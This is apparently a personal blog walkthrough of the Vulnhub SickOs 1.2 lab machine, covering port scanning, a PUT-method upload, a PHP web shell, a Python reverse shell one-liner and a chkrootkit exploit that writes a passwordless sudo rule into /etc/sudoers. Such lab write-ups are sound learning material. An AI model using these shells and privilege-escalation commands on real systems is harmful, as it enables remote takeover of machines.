Sunday, 9 October 2016

Vulnhub SickOs 1.2

I appear to have a Vulnhub addiction ATM! I put this down to having a free weekend so I can hone my skills :)

This VM was tricky towards the end as normal scripts etc didn't work.  I certainly had to get outside the box for this one!! It is a great VM and you should definitely give it a go.

So big thanks to Vulnhub and D4rk36 for this :)


root@kali:~# nmap -Pn -sV -p 0-65535

Starting Nmap 7.25BETA2 ( ) at 2016-10-08 16:11 BST
Nmap scan report for
Host is up (0.00030s latency).
Not shown: 65534 filtered ports
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
MAC Address: 00:0C:29:EB:E6:56 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 124.06 seconds


I'll see what ssh yields:

root@kali:~/Downloads# ssh
 .oooooo..o  o8o            oooo          .oooooo.                 .o        .oooo.
d8P'    `Y8  `"'            `888         d8P'  `Y8b              o888      .dP""Y88b
Y88bo.      oooo   .ooooo.   888  oooo  888      888  .oooo.o     888            ]8P'
 `"Y8888o.  `888  d88' `"Y8  888 .8P'   888      888 d88(  "8     888          .d8P'
     `"Y88b  888  888        888888.    888      888 `"Y88b.      888        .dP'  
oo     .d8P  888  888   .o8  888 `88b.  `88b    d88' o.  )88b     888  .o. .oP     .o
8""88888P'  o888o `Y8bod8P' o888o o888o  `Y8bood8P'  8""888P'    o888o Y8P 8888888888
By @D4rk36
root@'s password:

Not alot apart from nice ASCII art :D

I'll try port 80 then!


Navigating to the ip gives the following page.

The source code contains no hints, so I'll see if there is anything hidden:

root@kali:~/Downloads# dirb -w

• -----------------
• DIRB v2.22
• By The Dark Raver
• -----------------

• START_TIME: Sat Oct 8 16:22:08 2016
• WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
• OPTION: Not Stoping on warning messages

• -----------------


• ---- Scanning URL: ----
• + (CODE:200|SIZE:163)

• ---- Entering directory: ----
• (!) WARNING: Directory IS LISTABLE. No need to scan it.
• (Use mode '-w' if you want to scan it anyway)


Let's see what /test yields:


I try and see if there is anything in the way of known weaknesses in lighttpd/1.4.28 but I come away empty handed.

There must be a way to upload to this page....... Hang on!!! What methods are available on this web page can I PUT??

Phew!! I can PUT here. Now to find out how I can achieve this!! Ideally I want a reverse shell so pentestmonkey's one should do!! (

I upload it using nmap's scripting engine:

Check to see if it's there:

Awesome! I set my netcat listener on port 443 then click the file.


That failed miserably :(

Ok, I wonder if I can get a dirty shell on it?  I use the one liner:

<?php echo shell_exec($_GET['cmd']); ?>

Run the command via the browser:

Sweet!! Now I can try and throw a python listener my way.  I use 443 as it's a web port so less likely to be blocked:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

And the result is:


Now to start enumerating:

Ok happy with the release details now to see if I can write anywhere:
I can write to /tmp but when I upload my enumeration script it doesn't allow me to execute it :(

I start to enumerate manually and eventually find some things in the crontab:

I'll check out the daily one:

Ok some stuff in here time to start looking at their code.
After sifting through the code nothing jumps out at me so I revert to Google to see if the file "chkrootkit" has any flaws.

Exploit-DB comes up trumps with this

Awesome!! Now to create that /tmp/update file and leverage me some privileges!!

Inside the file I put:

chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers

This should give my www-data account sudo rights without a password :)

The cronjob runs and:

I am root :) 

Let's see what is lurking within:

Phew!! This made me stretch the old grey matter!!!!

No comments:

Post a Comment